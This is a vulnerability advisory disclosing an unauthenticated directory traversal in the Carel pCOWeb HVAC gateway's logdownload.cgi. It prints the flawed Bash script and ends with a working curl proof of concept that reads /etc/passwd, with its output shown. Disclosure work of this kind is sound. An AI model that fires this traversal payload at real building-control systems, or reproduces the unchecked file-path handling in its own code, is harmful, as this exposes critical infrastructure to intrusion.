Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal Vendor: CAREL INDUSTRIES S.p.A. Product web page: https://www.carel.com Affected version: Firmware: A2.1.0 - B2.1.0 Application Software: 2.15.4A Software version: v16 13020200 Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems. Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. ======================================================================================= /usr/local/www/usr-cgi/logdownload.cgi: --------------------------------------- 01: #!/bin/bash 02: 03: if [ "$REQUEST_METHOD" = "POST" ]; then 04: read QUERY_STRING 05: REQUEST_METHOD=GET 06: export REQUEST_METHOD 07: export QUERY_STRING 08: fi 09: 10: LOGDIR="/usr/local/root/flash/http/log" 11: 12: tmp=${QUERY_STRING%"$"*} 13: cmd=${tmp%"="*} 14: if [ "$cmd" = "dir" ]; then 15: PATHCURRENT=$LOGDIR/${tmp#*"="} 16: else 17: PATHCURRENT=$LOGDIR 18: fi 19: 20: tmp=${QUERY_STRING#*"$"} 21: cmd=${tmp%"="*} 22: if [ "$cmd" = "file" ]; then 23: FILECURRENT=${tmp#*"="} 24: else 25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then 26: FILECURRENT=lastlog.csv.gz 27: else 28: FILECURRENT=lastlog.csv 29: fi 30: fi 31: 32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then 33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n" 34: cat carel.inc.html 35: echo "
File not available!
" 36: cat carel.bottom.html 37: exit 38: fi 39: 40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then 41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then 42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then 43: echo -ne "Content-Type: text/csv\r\n" 44: else 45: echo -ne "Content-Type: image/svg+xml\r\n" 46: fi 47: else 48: echo -ne "Content-Type: image/bmp\r\n" 49: fi 50: else 51: echo -ne "Content-Type: application/x-gzip\r\n" 52: fi 53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n" 54: 55: cat $PATHCURRENT/$FILECURRENT ======================================================================================= Tested on: GNU/Linux 4.11.12 (armv7l) thttpd/2.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5709 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php 10.05.2022 -- $ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:65534:65534:nobody:/home:/bin/false guest:x:502:101::/home/guest:/bin/bash carel:x:500:500:Carel:/home/carel:/bin/bash http:x:48:48:HTTP users:/usr/local/www/http:/bin/false httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash sshd:x:1000:1001:SSH drop priv user:/:/bin/false